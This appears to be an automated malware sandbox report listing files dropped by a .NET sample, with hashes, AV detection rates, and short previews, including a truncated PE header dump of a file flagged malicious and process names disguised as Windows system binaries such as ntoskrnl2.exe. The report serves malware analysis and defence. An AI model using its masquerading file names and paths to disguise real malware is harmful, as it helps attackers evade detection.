                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                            C:\Recovery\c5cac97cf6c584

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (452), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):452
                                                            Entropy (8bit):5.85366364833806
                                                            Encrypted:false
                                                            SSDEEP:12:h4LycM22qpwzpe7Am1/d57jw9CE2pu8ggLQq73lKT7n:IrMLzM7V5dZdBgkS
                                                            MD5:4DB9F6AA671DBA42B2A99D3384212A59
                                                            SHA1:1D34B5EB7FB1890F7254E292D811CEC49F71306A
                                                            SHA-256:1C9923E563CFB3238798D7F594BF1E85DFD517E353312B594705770FC13E2108
                                                            SHA-512:6B07800D80EFC863A33318646880C5CC3FEE765C2C5DFBC7286463F4CB651DBE95C74673C123A7421A1C7450E97A87A2B21DE6A4C42F6A9328431B3919027719
                                                            Malicious:false
                                                            Preview:jaexxt6IoDE1BrWgzs1e7QhAZK2XEBQMeUwkP4sbWlVpVhfHkqLueQeS2eXm0jEmx2Xq5vR49ZIV52o2pvwYzfrNzdsuhFkwhs2dJyMyYQvFIJXA0e7FwpwRKJ0bDhX3yVxN9Lt0i8AjumFqGr4CIf915lS97vu031QwVJApvHgypNhiEKUWnUvTV6RY2t2xNJp3VSU6rPQA8KMrDu4xaYNjF6bZ1mwCPtlginMwzXpYDuVKukUIyFXy6GxZ05EEcOvPjpJahI7CtyfUlQpRRoOKWwkbzx54Sk6z8GlEb4kpHUFHldxkPxwy9l3wFrkuNDtI2pWfpl0XDiCBqc0W9UofxHzWNy8uT0cEl6O5GR5o6Zubj1Gn0Nu2YOVvz9S0nGDNF7atO5PsZ9iYXYxVsU3GGkpXldFH9EB0VhVlbWY47CcYp6XbM7ISM7HfSDHvzIsV

                                                            C:\Users\Public\Pictures\backgroundTaskHost.exe

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                            Category:dropped
                                                            Size (bytes):1430164
                                                            Entropy (8bit):7.968311057541044
                                                            Encrypted:false
                                                            SSDEEP:24576:qQnFtu+zlSu7WlmZuTJ8BNTnCe2RmndNY2ncoC8OOGOFqZjkJe6QvX:Hpz7BNBNTnx2azxcoBrZS3fP
                                                            MD5:C8848D70C25CF0A1E0A4122CAB55E5F8
                                                            SHA1:20E0CFFE94951E3201CA5AA3F5A2876B20408702
                                                            SHA-256:6EBED9F6DE82360A3724C5148EAACED3273CE3E48826492D87DA9D7E978EB6FC
                                                            SHA-512:B93AADA5CDF824C5FEB5C2A992A92CB929479241E7895C42C8A6AF32B11C72767523D4ABD641C44A0B2E310288E533F7AEEF3F1931023AC72154171BC83D2CC0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                            • Antivirus: Virustotal, Detection: 75%, Browse
                                                            Preview:MZ......................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                            C:\Users\Public\Pictures\eddb19405b7ce1

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:ASCII text, with very long lines (711), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):711
                                                            Entropy (8bit):5.881168638492327
                                                            Encrypted:false
                                                            SSDEEP:12:lUuYQ70LYrhR0W2PCztbUIJLkcCmbQkA1zkD+EJNsd1mEkRIRlKct5S971g8k1:nYpLYrhSWACFUQLkcKkPJNs5kRIucvSS
                                                            MD5:6B411C0574CE8715EED0EF793B33FA2A
                                                            SHA1:8EDDDFFCFBF035496999715D28AB73086CFC3A87
                                                            SHA-256:7994A1631EA96C8BF48B7D84A1D67922BAA00AC99210BCA12F70A507FF5E552A
                                                            SHA-512:65D230756DCFB1008E583834D2DD716EDC87EF07C6584FF03E594F2F7AA8729FDEA5D5B706AA0AAFDC5CF64371A82953BC1B9AFDC9C25D4EA3C0243A34BD4ED2
                                                            Malicious:false
                                                            Preview:1AYBwQOdJdDWyu4NTrqRI9mVN7G1NalpBMSoFW8mVazsxS3o6hmKG8i1XCxyJWQs1XVmcPI6sE5sK3h5Eb4qybjCnaQCiKd8KG1Z6RMrZpbCC0rde2urcj3ZyS9B8FXil7iDCI8xPNRIAhAxtxhqZvgkNbloRLsUR3aFRnbW47cOSuZRSLRLhrIza80lgUfDf70HG5gGVKwcTSScCUWG4hwjuloSw00jbZtU4SLXpLzW5pgIqYiM7ZJ7KQWeQNTfUMB3i7itJ9asraoFEgmYRomCPvKn6qHc1TBtomjs0zC88aQumQZtk5Oqk8oxx4xd271YY4ac73hclnDzfaApQX15EVJq8v55BjGBi1Vs07vqXwE64yRW4IMeF6TCuudM8maBgCQnERzSmLhSRMvJdiA3Xm5miS7FdjsvVCa1ioSmT314YBvh8UsZlho3HoFvUtzDcw6Ow4lzQYjduAOhhZGJ1TJyXht4igSjEycmEhvEt2JN7LIHaiO4mpLJmI0OKrRtFAY6ilc9nCa8K60MYmdARY6ZmS96qh4ClZH7xMjyFOQkPN9pRo0hNQbrD9TPmgTGIYXuz3ZLDp5DIWJZTUpCqWyU7Z4y3TMj5Jc1zO0YOoehVYjqz36R0RawjDxZ8lStdWH84RkEeRxB1R9i0N89X4sosqSvbaZnWuD9QkwiS1xjdY4REPjvmSWjndPN9ynD2Jp

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XUkPLaESKIkbWXdxlvmVntDv.exe.log

                                                            Download File
                                                            Process:C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1281
                                                            Entropy (8bit):5.370111951859942
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

                                                            Download File
                                                            Process:C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1281
                                                            Entropy (8bit):5.370111951859942
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ntoskrnl2.exe.log

                                                            Download File
                                                            Process:C:\Windows\System32\ntoskrnl2.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1740
                                                            Entropy (8bit):5.36827240602657
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKk+HKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKk+qZ4vtpv
                                                            MD5:1152A0332636E97D888ECFF02C1B19A9
                                                            SHA1:365D4052647A8B9BCC0512CBCFB12279316549FD
                                                            SHA-256:C72695BD822EB0EB112850B84D7ABBD5BADF07C3A0A670422D9DA3620BAE6EB4
                                                            SHA-512:9FFC281DBF24C21DDEC4BE93941339B7601AD12C24D11176668DBDFD0AD5826FDA463620BF9E129030D9119BF9A9E21C45A999F31249AA9BD65B85546783AD28
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllultnxj:NllU
                                                            MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                            SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                            SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                            SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                            Malicious:false
                                                            Preview:@...e................................................@..........

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1123mldo.m4l.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wfz5xxy.vrq.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5iqcewyf.ycl.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rader0v.vct.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acu3hfx4.aum.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgozlqsb.cak.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhrze3za.bfs.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxkou4wd.y5n.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgifpi1l.sky.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_foj0cyxh.wxh.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gixi0piz.clo.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5uzisrv.y3d.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4e1s0ly.wuc.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnumi33g.jqk.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3kmqqnl.w52.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbvhpc15.c24.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdkglndo.egk.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
